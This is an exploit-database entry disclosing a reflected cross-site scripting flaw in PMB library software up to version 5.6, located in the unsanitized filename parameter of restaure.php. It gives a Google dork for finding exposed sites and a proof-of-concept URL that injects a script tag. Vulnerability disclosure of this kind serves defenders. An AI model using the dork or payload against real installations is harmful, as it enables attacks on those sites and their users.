id: 34705
date: 07/19/2020
title: PMB 5.6 Cross Site Scripting Vulnerability
author: 41-trk
cves: 

# Exploit Title: PMB 5.6 Cross Site Scripting XSS
# Google Dork: inurl:opac_css
# Exploit Author: 41-trk (Tarik Bakir)
# Email: tarikbak999[at]gmail.com
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6 

-==== Vulnerability ====-


Variable $filename isn't properly sanitized in file /admin/sauvegarde/restaure.php.


-==== POC ====-

http://localhost/[PMB_PATH]//admin/sauvegarde/restaure.php?filename="><script>alert(1)</script>&critical=1

================================

#  0day.today [2023-03-25]  #